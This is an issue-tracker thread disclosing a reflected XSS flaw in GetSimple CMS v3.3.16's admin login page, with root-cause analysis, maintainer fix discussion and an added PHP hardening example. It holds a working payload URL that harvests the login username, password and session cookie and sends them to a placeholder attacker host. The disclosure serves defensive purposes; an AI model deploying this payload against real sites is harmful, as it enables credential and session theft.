Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' #1330
Comments
Any update on this? I signed up and messaged all admins on the GS forum and got 1 reply from Shawn.

Not sure I ever got the email, let me check.

Got it, overlooked.

Stupid question, mostly a curiosity: do you know WHY it breaks the CSS? I see no reason it should http://localhost:8888/dev/getsimple/develop/admin/index.php/asdfasdfasdfasdfasf
It's your myself(false) function (defined in basic.php) that is echo'd into the form action.

Analysis

    return htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);

    $_SERVER['PHP_SELF'] = "/admin/index.php/breakout"

https://www.php.net/manual/en/function.basename.php

    $_SERVER['QUERY_STRING'] = ""

As a final result, we end up with:

The above "breakout?" is HTML encoded, but since it's already the action of a form, it will execute JavaScript put there when the form is posted. The '?' at the end presents some initial complications, but it can be discarded as a comment by adding '//' at the end (URL encoded). The HTML encoding can also be bypassed: since it's JavaScript, you can just use decodeURIComponent() to get any character back you want to use.

Example payload to steal username and password:

    http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome "+username+"! Sending your credentails and session to a remote attacker!");window.location.replace("test");%2f%2f
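To make the root cause in the analysis above concrete from the fixing side, here is an added example (not GetSimple's code and not the 3.3.17 patch) that reproduces the basename(PHP_SELF) pattern next to a hardened variant. The $_SERVER array is constructed to mimic the "/admin/index.php/breakout" request; the hardened function, its allow-list and the SCRIPT_NAME approach are this editor's suggestion, not something the thread prescribes.

```php
<?php
// Added example, not GetSimple's own code. $server values are constructed.

// The pattern the analysis describes: basename() of PHP_SELF, entity-encoded.
// PHP_SELF includes PATH_INFO, so for "/admin/index.php/breakout" basename()
// returns "breakout" (the trailing path segment), not the script name, and
// request-controlled text ends up inside the form's action attribute.
function myself_vulnerable(array $server): string
{
    return htmlentities(basename($server['PHP_SELF']), ENT_QUOTES);
}

// Hardened variant (assumption, not the project's fix): derive the name from
// SCRIPT_NAME, which does not carry PATH_INFO, and accept only known scripts.
// The allow-list also covers deployments where SCRIPT_NAME is misconfigured.
function myself_hardened(array $server, array $allowed = ['index.php']): string
{
    $name = basename($server['SCRIPT_NAME'] ?? '');
    if (!in_array($name, $allowed, true)) {
        $name = 'index.php'; // fall back to a fixed, known-safe value
    }
    return htmlentities($name, ENT_QUOTES);
}

// Constructed environment for a request to /admin/index.php/breakout.
$server = [
    'PHP_SELF'    => '/admin/index.php/breakout',
    'SCRIPT_NAME' => '/admin/index.php',
    'PATH_INFO'   => '/breakout',
];

echo 'vulnerable action: ', myself_vulnerable($server), "\n"; // breakout
echo 'hardened action:   ', myself_hardened($server), "\n";   // index.php
```

Entity encoding alone does not help here because the value is an attribute that the browser later navigates to, so the defensive move is to stop echoing request-derived path data at all. As a complementary, server-side control, Apache's AcceptPathInfo directive can be set to Off so that requests with trailing path segments after .php are rejected instead of reaching the script, which also addresses the "apache doesn't discard pathing after .php" observation below.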
Yeah, it's already fixed in 3.4. PHP_SELF is all over the place; added mitigation in 3.3.17, will have to look through the rest for hardcoded ones. Thanks for the full disclosure, still wondering about the CSS flow breaking.... lol
doh, thanks! I saw it loading and no network error. All assets in 3.4 are absolute now, except for style.php; that might be a bug. Interesting that Apache doesn't discard pathing after .php, I never noticed this before.
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in the 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials via the client clicking a link, entering credentials, and submitting the login form.